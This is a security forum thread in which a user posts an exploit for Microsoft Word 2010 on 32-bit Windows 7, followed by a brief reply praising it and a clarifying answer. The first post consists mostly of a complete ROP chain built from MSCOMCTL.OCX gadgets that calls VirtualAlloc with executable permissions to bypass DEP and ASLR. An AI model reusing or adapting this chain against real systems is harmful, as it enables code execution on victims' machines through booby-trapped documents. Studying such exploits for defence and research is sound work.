Results 1 to 3 of 3

Thread: Bypassing DEP using VirtualAlloc for MS WORD 2010 in Windows 7 Share/Save - My123World.Com!

  1. #1

    Cool Bypassing DEP using VirtualAlloc for MS WORD 2010 in Windows 7

    Exploit For MS WORD 2010

    ASLR BYPASS - MSCOMCTL.OCX (non-ASLR Module)
    DEP BYPASS - Complete code in code section

    #ROP CHAIN
    Code:
    control  = "01115827"  #0x27581101 # RET [Module: Mscomctl.OCX]
    control += "01115827"  #0x27581101 # RET [Module: Mscomctl.OCX]
    control += "01115827"  #0x27581101 # RET [Module: Mscomctl.OCX]
    control += "01115827"  #0x27581101 # RET [Module: Mscomctl.OCX]
    control += "01115827"  #0x27581101 # RET [Module: Mscomctl.OCX]
    
    #-----------------------put Stack Pointer in EAX & EDI --------------------------#
    
    rop  = "56455a27"   #0x275A4556 # PUSH ESP # AND AL,8 #  MOV ECX,DWORD PTR DS:[ESI] # MOV DWORD PTR DS:[EDX],ECX # POP ESI # RETN 8 [Module: Mscomctl.OCX]
    rop += "b8b25827"   #0x2758B2B8 # MOV EAX,ESI # POP ESI # POP EBP # RET [Module: Mscomctl.OCX]
    rop += "42424242"
    rop += "43434343"
    rop += "44444444"
    rop += "41414141"
    rop += "c21a5827"   #0x27581AC2 # XCHG EAX,EDX # RET [Module: Mscomctl.OCX]
    rop += "5e7f6127"   #0x27617F5E # MOV EAX,EDX # RET 4 [Module: Mscomctl.OCX]
    rop += "810a5b27"   #0x275B0A81 # ADD ESP,14 # RET 4 [Module: Mscomctl.OCX]
    
    #-------------------Parameters for VirtualAlloc() ----------------------------#
    VP  = "a42f5827"  # JMP EDI # CALL VirtualAlloc()
    VP += "42424242"  # Return Address
    VP += "43434343"  # lpAdress
    VP += "01000000"  # dwSize(0x1)
    VP += "00100000"  # SIZE 1000
    VP += "40000000"  # flProtect (0x40) # RWX
    
    #--------------------     Setting 1st Parameter   --------------------------------------#
    
    rop1  = "869c5927"  # 0X27599C86 # XCHG EAX,ECX # ....# RETN 24 
    rop1 += "5e7f6127"  # 0X27617F5E # MOV EAX,EDX # RET 4 
    rop1 += "5e7f6127"  # 0X27617F5E # MOV EAX,EDX # RET 4
    rop1 += "5e7f6127" # 0X27617F5E # MOV EAX,EDX # RET 4
    rop1 += "51515151" # PADDING
    rop1 += "52525252" # PADDING
    rop1 += "53535353" # PADDING
    rop1 += "54545454" # PADDING
    rop1 += "55555555" # PADDING
    rop1 += "56565656" # PADDING
    rop1 += "57575757" # PADDING
    rop1 += "58585858" # PADDING
    rop1 += "41414141" # PADDING
    rop1 += "eaad5927" # 0X2759ADEA # DEC ECX # RETN
    rop1 += "eaad5927" # 0X2759ADEA # DEC ECX # RETN
    rop1 += "eaad5927" # 0X2759ADEA # DEC ECX # RETN
    rop1 += "eaad5927" # 0X2759ADEA # DEC ECX # RETN
    rop1 += "eaad5927" # 0X2759ADEA # DEC ECX # RETN
    rop1 += "32ad5827" # 0x2758AD32 # POP ESI # RETN
    rop1 += "14010000" # PADDING
    rop1 += "4d2d5f27" # 0X275F2D4D # ADD EAX,ESI # POP ESI # RETN 8
    rop1 += "b6b35a27" # 0X275AB3B6 # MOV DWORD PTR DS:[ECX+2C],EAX # RETN 4
    rop1 += "b6b35a27" # 0X275AB3B6 # MOV DWORD PTR DS:[ECX+2C],EAX # RETN 4
    
    #--------------------     Setting 2nd Parameter   --------------------------------------#
    rop2  = "41414141"  # PADDING
    rop2 += "42424242"  # PADDING
    rop2 += "eaad5927"  # 0X2759ADEA # DEC ECX # RETN
    rop2 += "eaad5927"  # 0X2759ADEA # DEC ECX # RETN
    rop2 += "eaad5927"  # 0X2759ADEA # DEC ECX # RETN
    rop2 += "eaad5927"  # 0X2759ADEA # DEC ECX # RETN
    rop2 += "eaad5927"  # 0X2759ADEA # DEC ECX # RETN
    rop2 += "b6b35a27"  # 0X275AB3B6 # MOV DWORD PTR DS:[ECX+2C],EAX # RETN 4
    
    #------------------------- Fetch & Call VirtualAlloc() address  ----------------------#
    rop2 += "a40d5927"  # 0X27590DA4 # POP EAX # RETN
    rop2 += "c8115827"  #  0X275811C8 # kernel32.VirtualAlloc
    rop2 += "c8115827"  #  0X275811C8 # kernel32.VirtualAlloc
    rop2 += "6c0b5e27"  # 0X275E0B6C # MOV EAX,DWORD PTR DS:[EAX] # RETN
    rop2 += "46ea5927"  # 0X2759EA46 # XCHG EAX,EDI # RETN
    rop2 += "c21a5827"  # 0X27581AC2 # XCHG EAX,EDX # RETN
    rop2 += "32ad5827"  # 0X2758AD32 # POP ESI # RETN
    rop2 += "20000000"  # PADDING
    rop2 += "4d2d5f27"  # 0X275F2D4D # ADD EAX,ESI # POP ESI # RETN 8
    rop2 += "42424242"
    rop2 += "ee8b5927"  # 0X27598BEE # XCHG EAX,ESP # RETN
    Last edited by w@rri0r@bh@y; 03-02-2014 at 07:54 PM.

  2. #2
    Security Researcher fb1h2s's Avatar
    Join Date
    Jul 2010
    Location
    India
    Posts
    616
    Blog Entries
    32
    Excellent post mate expecting more form you. One doubt does Word 2010 install a 32 bit version or 64 bit version by default ?
    Hacking Is a Matter of Time Knowledge and Patience

  3. #3

    Cool

    Quote Originally Posted by fb1h2s View Post
    Excellent post mate expecting more form you. One doubt does Word 2010 install a 32 bit version or 64 bit version by default ?
    Its for word 2010 x86 (32 bit version)

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •